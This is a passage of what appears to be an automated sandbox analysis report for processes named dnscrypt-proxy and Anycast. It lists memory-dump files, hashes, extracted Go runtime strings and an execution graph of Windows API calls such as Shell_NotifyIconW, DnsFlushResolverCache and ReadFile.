                                                                                                                              • Associated: 00000027.00000002.2170698304.000000000113F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000027.00000002.2170711682.0000000001140000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000027.00000002.2170711682.000000000114A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000027.00000002.2170711682.000000000114E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000027.00000002.2170711682.000000000116A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000027.00000002.2170711682.000000000116F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000027.00000002.2170782110.000000000117A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000027.00000002.2170794560.000000000117B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_39_2_960000_dnscrypt-proxy.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: m->p= max= min= next= p->m= prev= span=% util%.0fm %.2fm %0.16X%0.16x%s: %s(...), i = , id: , not , val .onion0.%02d0x%04X390625<-chan</a>.ACPKIXAcceptAnswerArabicAugustBADALGBADKEYBADSIGBasic BrahmiCANCELCarianChakmaClientClosedCommonCookieCopticDAEMONDE$ p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = , settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=;; opcode: AUTHORITY: BLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad RequestCERTIFI$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontoml: (l$releasep: m=remote errorruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinestatic relaysweepWaiterstls10defaulttraceStringstransmitfileunknown portwintrust.dllwirep: p->m=worker mode wtsapi32.dllzghjccbob3n0 != swee
                                                                                                                              • API String ID: 0-1666905256
                                                                                                                              • Opcode ID: 1dcabf54b9f908f1acdc3b1a9cf94ef2231e202d51250ff103f22c5561dbd998
                                                                                                                              • Instruction ID: ce32a90c7a517e09a3ee9a006978aebe2944105093d152fa93d6e8f5f5fd7ac9
                                                                                                                              • Opcode Fuzzy Hash: 1dcabf54b9f908f1acdc3b1a9cf94ef2231e202d51250ff103f22c5561dbd998
                                                                                                                              • Instruction Fuzzy Hash: 9E31E2B8509701CFDB00EF68C18575ABBE5BF88714F05896DE48887352DB75D888CFA2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Non-executed Functions

                                                                                                                              Function 009921E0 Relevance: 11.4, Strings: 9, Instructions: 172COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextpstream %d canceled with error code %dstrings: Repeat count causes overflows, xrefs: 009924FB
                                                                                                                              • bad g0 stackbad rdlengthbad recoveryc ap trafficc hs trafficcaller errorcan't happencas64 failedchan receiveclose notifycontent-typecontext.TODOd.f.ip6.arpadata_on_idledearmyrouterdumping heapdup_trailersempty packetend tracegcentersyscallf.f.ip6.arpagcBitsAr, xrefs: 009923EA
                                                                                                                              • runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=scavengeOne called with unaligned work regiontls: failed to find any PEM data in key inputtls: internal error: failed to update binderstls: internal error: unexpected ren, xrefs: 0099246C
                                                                                                                              • runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtime: unknown unit timing-allow-origintoo many open filesunexpected '""""""'unexpected "''''''"unexpected g , xrefs: 0099237B
                                                                                                                              • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:, xrefs: 00992411
                                                                                                                              • runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=scavengeOne called with unaligned work regiontls: failed to find any PEM data in key inputtls: internal error: failed to upda, xrefs: 009924C7
                                                                                                                              • VirtualQuery for stack base failedadding nil Certificate to CertPoolbad scalar length: %d, expected %dchacha20: wrong HChaCha20 key sizeconnection doesn't support Ed25519crypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid bu, xrefs: 00992445
                                                                                                                              • %, xrefs: 00992504
                                                                                                                              • CreateWaitableTimerEx when creating timer failedResolving [%s] using bootstrap resolvers over %sStamp error for the static [%s] definition: [%v]Time.MarshalJSON: year outside of range [0,9999]Time.MarshalText: year outside of range [0,9999]Tracking %d connecti, xrefs: 009924A0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000029.00000002.4447617404.0000000000961000.00000020.00000001.01000000.00000011.sdmp, Offset: 00960000, based on PE: true
                                                                                                                              • Associated: 00000029.00000002.4447549936.0000000000960000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000029.00000002.4449171473.0000000000D62000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000029.00000002.4451453533.00000000010F9000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000029.00000002.4451673010.0000000001101000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000029.00000002.4451762956.0000000001102000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000029.00000002.4451898443.0000000001103000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000029.00000002.4452138709.0000000001139000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000029.00000002.4452238886.000000000113B000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000029.00000002.4452329882.000000000113D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000029.00000002.4452395425.000000000113F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000029.00000002.4452487723.0000000001140000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000029.00000002.4452487723.000000000114A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000029.00000002.4452487723.000000000116A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000029.00000002.4452773272.000000000117A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000029.00000002.4452866933.000000000117B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_41_2_960000_dnscrypt-proxy.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: %$CreateWaitableTimerEx when creating timer failedResolving [%s] using bootstrap resolvers over %sStamp error for the static [%s] definition: [%v]Time.MarshalJSON: year outside of range [0,9999]Time.MarshalText: year outside of range [0,9999]Tracking %d connecti$VirtualQuery for stack base failedadding nil Certificate to CertPoolbad scalar length: %d, expected %dchacha20: wrong HChaCha20 key sizeconnection doesn't support Ed25519crypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid bu$bad g0 stackbad rdlengthbad recoveryc ap trafficc hs trafficcaller errorcan't happencas64 failedchan receiveclose notifycontent-typecontext.TODOd.f.ip6.arpadata_on_idledearmyrouterdumping heapdup_trailersempty packetend tracegcentersyscallf.f.ip6.arpagcBitsAr$runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=scavengeOne called with unaligned work regiontls: failed to find any PEM data in key inputtls: internal error: failed to upda$runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextpstream %d canceled with error code %dstrings: Repeat count causes overflows$runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=scavengeOne called with unaligned work regiontls: failed to find any PEM data in key inputtls: internal error: failed to update binderstls: internal error: unexpected ren$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:$runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtime: unknown unit timing-allow-origintoo many open filesunexpected '""""""'unexpected "''''''"unexpected g
                                                                                                                              • API String ID: 0-952561003
                                                                                                                              • Opcode ID: 1f877041f9d226303a19ffc6c038bdb65918573bfc3b3445809be0650eccb83b
                                                                                                                              • Instruction ID: 857203401fed46afe9a994a244e13022f30956aa7539a8db2677c0ba11cce06d
                                                                                                                              • Opcode Fuzzy Hash: 1f877041f9d226303a19ffc6c038bdb65918573bfc3b3445809be0650eccb83b
                                                                                                                              • Instruction Fuzzy Hash: 6C8101B45097019FDB00EFA8C185B5ABBE4BF88748F01892CF48897352EB79D948CF52
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 009A1A70 Relevance: 5.1, Strings: 4, Instructions: 81COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontoml: (l, xrefs: 009A1BC1
                                                                                                                              • m->p= max= min= next= p->m= prev= span=% util%.0fm %.2fm %0.16X%0.16x%s: %s(...), i = , id: , not , val .onion0.%02d0x%04X390625<-chan</a>.ACPKIXAcceptAnswerArabicAugustBADALGBADKEYBADSIGBasic BrahmiCANCELCarianChakmaClientClosedCommonCookieCopticDAEMONDE, xrefs: 009A1B2B
                                                                                                                              • releasep: m=remote errorruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinestatic relaysweepWaiterstls10defaulttraceStringstransmitfileunknown portwintrust.dllwirep: p->m=worker mode wtsapi32.dllzghjccbob3n0 != swee, xrefs: 009A1B09
                                                                                                                              • p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = , settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=;; opcode: AUTHORITY: BLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad RequestCERTIFI, xrefs: 009A1B77
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000029.00000002.4447617404.0000000000961000.00000020.00000001.01000000.00000011.sdmp, Offset: 00960000, based on PE: true
                                                                                                                              • Associated: 00000029.00000002.4447549936.0000000000960000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000029.00000002.4449171473.0000000000D62000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000029.00000002.4451453533.00000000010F9000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000029.00000002.4451673010.0000000001101000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000029.00000002.4451762956.0000000001102000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000029.00000002.4451898443.0000000001103000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000029.00000002.4452138709.0000000001139000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000029.00000002.4452238886.000000000113B000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000029.00000002.4452329882.000000000113D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000029.00000002.4452395425.000000000113F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000029.00000002.4452487723.0000000001140000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000029.00000002.4452487723.000000000114A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000029.00000002.4452487723.000000000116A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000029.00000002.4452773272.000000000117A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000029.00000002.4452866933.000000000117B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_41_2_960000_dnscrypt-proxy.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: m->p= max= min= next= p->m= prev= span=% util%.0fm %.2fm %0.16X%0.16x%s: %s(...), i = , id: , not , val .onion0.%02d0x%04X390625<-chan</a>.ACPKIXAcceptAnswerArabicAugustBADALGBADKEYBADSIGBasic BrahmiCANCELCarianChakmaClientClosedCommonCookieCopticDAEMONDE$ p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = , settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=;; opcode: AUTHORITY: BLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad RequestCERTIFI$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontoml: (l$releasep: m=remote errorruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinestatic relaysweepWaiterstls10defaulttraceStringstransmitfileunknown portwintrust.dllwirep: p->m=worker mode wtsapi32.dllzghjccbob3n0 != swee
                                                                                                                              • API String ID: 0-1666905256
                                                                                                                              • Opcode ID: 1dcabf54b9f908f1acdc3b1a9cf94ef2231e202d51250ff103f22c5561dbd998
                                                                                                                              • Instruction ID: ce32a90c7a517e09a3ee9a006978aebe2944105093d152fa93d6e8f5f5fd7ac9
                                                                                                                              • Opcode Fuzzy Hash: 1dcabf54b9f908f1acdc3b1a9cf94ef2231e202d51250ff103f22c5561dbd998
                                                                                                                              • Instruction Fuzzy Hash: 9E31E2B8509701CFDB00EF68C18575ABBE5BF88714F05896DE48887352DB75D888CFA2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:12.6%
                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                              Signature Coverage:0%
                                                                                                                              Total number of Nodes:134
                                                                                                                              Total number of Limit Nodes:11
                                                                                                                              execution_graph 84492 7215860 84493 7215869 84492->84493 84496 72158a8 84493->84496 84497 72158c5 84496->84497 84500 7214e58 84497->84500 84501 7214e6c 84500->84501 84504 72144d8 84501->84504 84505 721450d 84504->84505 84508 72121e4 84505->84508 84509 7214578 Shell_NotifyIconW 84508->84509 84511 7214677 84509->84511 84512 7213870 84513 7213882 84512->84513 84516 72143c9 84513->84516 84517 7214406 84516->84517 84518 721441f 84517->84518 84523 72144d8 Shell_NotifyIconW 84517->84523 84524 72144c8 84517->84524 84519 7214444 84519->84518 84528 721470f 84519->84528 84536 7214720 84519->84536 84523->84519 84525 72144d8 84524->84525 84526 72121e4 Shell_NotifyIconW 84525->84526 84527 7214526 84526->84527 84527->84527 84529 7214720 84528->84529 84530 72121e4 Shell_NotifyIconW 84529->84530 84531 7214740 84530->84531 84533 7214761 84531->84533 84534 72144d8 Shell_NotifyIconW 84531->84534 84532 7214780 84532->84518 84533->84532 84535 72144d8 Shell_NotifyIconW 84533->84535 84534->84533 84535->84532 84537 72121e4 Shell_NotifyIconW 84536->84537 84538 7214740 84537->84538 84539 7214761 84538->84539 84541 72144d8 Shell_NotifyIconW 84538->84541 84540 7214780 84539->84540 84542 72144d8 Shell_NotifyIconW 84539->84542 84540->84518 84541->84539 84542->84540 84543 7213ec0 84544 7213f0b CreateWindowExW 84543->84544 84546 7213f75 84544->84546 84547 72168c8 84548 72168e7 84547->84548 84551 7218748 84548->84551 84552 7218769 84551->84552 84553 72144d8 Shell_NotifyIconW 84552->84553 84554 7216942 84553->84554 84639 7214ad8 84640 7214af7 84639->84640 84643 7214e58 Shell_NotifyIconW 84640->84643 84645 7214eed 84640->84645 84650 7214de9 84640->84650 84641 7214b5f 84643->84641 84646 7214e99 84645->84646 84649 7214ef2 84645->84649 84647 72144d8 Shell_NotifyIconW 84646->84647 84648 7214ece 84647->84648 84648->84641 84649->84641 84651 7214df2 84650->84651 84652 7214dca 84651->84652 84653 72144d8 Shell_NotifyIconW 84651->84653 84652->84641 84654 7214ece 84653->84654 84654->84641 84484 17ac7f0 84485 17ac810 84484->84485 84486 17ac880 84485->84486 84488 17ac4d4 84485->84488 84489 17acc28 DnsFlushResolverCache 84488->84489 84491 17acc93 84489->84491 84491->84486 84555 6da3430 84556 6da3457 84555->84556 84557 6da3460 84556->84557 84559 6da7ea1 84556->84559 84560 6da7e8f 84559->84560 84562 6da7eae 84559->84562 84560->84557 84561 6da80c4 84561->84557 84562->84561 84565 6dabf98 84562->84565 84570 6dabf20 84562->84570 84566 6dabfd2 84565->84566 84567 6dac003 84566->84567 84575 6e20790 84566->84575 84588 6e207a0 84566->84588 84567->84561 84571 6dabf25 84570->84571 84572 6dabf7a 84571->84572 84573 6e207a0 2 API calls 84571->84573 84574 6e20790 2 API calls 84571->84574 84572->84561 84573->84572 84574->84572 84577 6e207a0 84575->84577 84576 6e207e4 84576->84567 84577->84576 84579 6e20854 84577->84579 84585 6e207a0 2 API calls 84577->84585 84586 6e20790 2 API calls 84577->84586 84601 6e208b1 84577->84601 84578 6e20843 84578->84579 84606 6e20dd8 84578->84606 84610 6e20dce 84578->84610 84614 6e209c0 84579->84614 84619 6e209b0 84579->84619 84580 6e2097a 84580->84567 84585->84578 84586->84578 84590 6e207c2 84588->84590 84589 6e207e4 84589->84567 84590->84589 84592 6e20854 84590->84592 84596 6e207a0 2 API calls 84590->84596 84597 6e20790 2 API calls 84590->84597 84598 6e208b1 2 API calls 84590->84598 84591 6e20843 84591->84592 84599 6e20dd8 ReadFile 84591->84599 84600 6e20dce ReadFile 84591->84600 84594 6e209c0 2 API calls 84592->84594 84595 6e209b0 2 API calls 84592->84595 84593 6e2097a 84593->84567 84594->84593 84595->84593 84596->84591 84597->84591 84598->84591 84599->84592 84600->84592 84602 6e208b2 84601->84602 84604 6e209c0 2 API calls 84602->84604 84605 6e209b0 2 API calls 84602->84605 84603 6e2097a 84603->84578 84604->84603 84605->84603 84607 6e20e2a ReadFile 84606->84607 84609 6e20e7a 84607->84609 84609->84579 84611 6e20e2a ReadFile 84610->84611 84613 6e20e7a 84611->84613 84613->84579 84615 6e209fa 84614->84615 84616 6e20a18 84615->84616 84624 6e20aa3 84615->84624 84616->84580 84620 6e209c0 84619->84620 84621 6e20a18 84620->84621 84623 6e20aa3 2 API calls 84620->84623 84621->84580 84622 6e20a5c 84623->84622 84625 6e20ad8 84624->84625 84626 6e20b42 84625->84626 84629 6e20cc8 84625->84629 84634 6e20cb9 84625->84634 84630 6e20cf2 84629->84630 84631 6e20cee 84629->84631 84630->84631 84632 6e20dd8 ReadFile 84630->84632 84633 6e20dce ReadFile 84630->84633 84631->84626 84632->84631 84633->84631 84636 6e20cc8 84634->84636 84635 6e20cee 84635->84626 84636->84635 84637 6e20dd8 ReadFile 84636->84637 84638 6e20dce ReadFile 84636->84638 84637->84635 84638->84635

                                                                                                                              Executed Functions

                                                                                                                              Function 0CCC3C2F Relevance: 3.0, Strings: 2, Instructions: 501COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4473804634.000000000CCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0CCC0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_ccc0000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (aq$\;]q
                                                                                                                              • API String ID: 0-320048529
                                                                                                                              • Opcode ID: 2e713793a1bb170f6a82968fcf8499cd9ce3b00aaead4a641310ebdf75e0f249
                                                                                                                              • Instruction ID: 168a4e5b1c2a2c371037c1a027645f260eb694832569fe1e083dfc61f908354a
                                                                                                                              • Opcode Fuzzy Hash: 2e713793a1bb170f6a82968fcf8499cd9ce3b00aaead4a641310ebdf75e0f249
                                                                                                                              • Instruction Fuzzy Hash: 9F226D34B10619CFCB14DF78C89469DB7B5FF89304F1582A9E846AB251EF70EA85CB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06DA62E8 Relevance: 3.0, Strings: 2, Instructions: 496COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4464492494.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_6da0000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: b$p<]q
                                                                                                                              • API String ID: 0-2934331629
                                                                                                                              • Opcode ID: e75577b1113b62cdd92d0df8efb4464d860642e8846a78f14d3d081b0fa57d0e
                                                                                                                              • Instruction ID: 1dfcbcb9d98050b26328c13f8f19fd63fcf7920e9205f7c06d5aa6fe5013c673
                                                                                                                              • Opcode Fuzzy Hash: e75577b1113b62cdd92d0df8efb4464d860642e8846a78f14d3d081b0fa57d0e
                                                                                                                              • Instruction Fuzzy Hash: C6123B74A00215CFCB44DF68D994AAEB7B6FF88304B1585A9E906DB375DB34EC06CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06DABF98 Relevance: 1.7, Strings: 1, Instructions: 464COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4464492494.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_6da0000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: MP
                                                                                                                              • API String ID: 0-1868919363
                                                                                                                              • Opcode ID: d10a9619bda12d05decc63abe5cf9b117327773c8431c0e1cc1a434526f78103
                                                                                                                              • Instruction ID: 88dfdb58f0362f35a713d05eca8ea94ba90830bdc53c2c9a6bd4b69bb8e815a1
                                                                                                                              • Opcode Fuzzy Hash: d10a9619bda12d05decc63abe5cf9b117327773c8431c0e1cc1a434526f78103
                                                                                                                              • Instruction Fuzzy Hash: 5332F731D1071ACBCB61DF69C844A99F7B2FF89310F15869AD5497B221EB70AAC5CF80
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06DA7EA1 Relevance: 1.6, Strings: 1, Instructions: 361COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4464492494.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_6da0000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: LR]q
                                                                                                                              • API String ID: 0-3081347316
                                                                                                                              • Opcode ID: 6d95de1f19c9452bb7f7d94029eb4ee9b9de1c6fac1498b90793c62b29c353d0
                                                                                                                              • Instruction ID: 974d2c4e4439ba8377b753a25b9f4057c5f61e1f3e47ac0d09e6121c1da54ffb
                                                                                                                              • Opcode Fuzzy Hash: 6d95de1f19c9452bb7f7d94029eb4ee9b9de1c6fac1498b90793c62b29c353d0
                                                                                                                              • Instruction Fuzzy Hash: 56E11835A107098FCB58DF68C99499DBBF6FF89300B1581A9E90A9B375DB31EC45CB80
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0CCC5568 Relevance: .8, Instructions: 796COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4473804634.000000000CCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0CCC0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_ccc0000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 784be12027f6a7829a1fb3b422e921f5805e8f8c7327c51c4d2c4e3fd0ce4fa8
                                                                                                                              • Instruction ID: b674bc122331669c428b92eff70e19e4d0cc88f3c4809620c57999728147c03c
                                                                                                                              • Opcode Fuzzy Hash: 784be12027f6a7829a1fb3b422e921f5805e8f8c7327c51c4d2c4e3fd0ce4fa8
                                                                                                                              • Instruction Fuzzy Hash: 0542C3357146048FDB188B69D498BBE77B2EB89700F25885EE503CBB91CB74FC829B45
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0CCCEA98 Relevance: .4, Instructions: 373COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4473804634.000000000CCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0CCC0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_ccc0000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 91c2e9d4eadf9f6b7844cc47c043a08e5d5281cfd40c8373f323cf25c3c9b54a
                                                                                                                              • Instruction ID: db29dba8d37dfca5c7fff902a84f52cc64c92720df04386e501fdcf2d51553c2
                                                                                                                              • Opcode Fuzzy Hash: 91c2e9d4eadf9f6b7844cc47c043a08e5d5281cfd40c8373f323cf25c3c9b54a
                                                                                                                              • Instruction Fuzzy Hash: 58F11975B006198FCB15CFA9C98499DBBF6FF89310B2582A9E805AB365D730ED42CF50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0C3266C2 Relevance: .1, Instructions: 144COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4472941801.000000000C320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C320000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_c320000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a7105c23afab47f8132ce0d73ffa2d35e15d7961f1d82e592872bbf59ba07329
                                                                                                                              • Instruction ID: a5d592ac88d81972ab6277311662b3f0bbe178ce5f1146d03363f701c8a2d77b
                                                                                                                              • Opcode Fuzzy Hash: a7105c23afab47f8132ce0d73ffa2d35e15d7961f1d82e592872bbf59ba07329
                                                                                                                              • Instruction Fuzzy Hash: F651B370B245A9CBCF385FBE94D143B7FF6AF896047384C99E4C68A549DA309841CF85
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0C3266C8 Relevance: .1, Instructions: 143COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4472941801.000000000C320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C320000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_c320000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f7de9b0f3955407dca99046bf41c2f947d38c0c251814f6131a8553247e7b527
                                                                                                                              • Instruction ID: 25cad9ace2f10188e44602e3009ed538c4da9e222b4d9f92e436ffca3d3091a4
                                                                                                                              • Opcode Fuzzy Hash: f7de9b0f3955407dca99046bf41c2f947d38c0c251814f6131a8553247e7b527
                                                                                                                              • Instruction Fuzzy Hash: 7A41B270B245A98BCF385FBE94E143B7FF6AF896007384C99E4C68A549DE209841CF85
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0C326CB0 Relevance: 20.9, Strings: 16, Instructions: 872COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
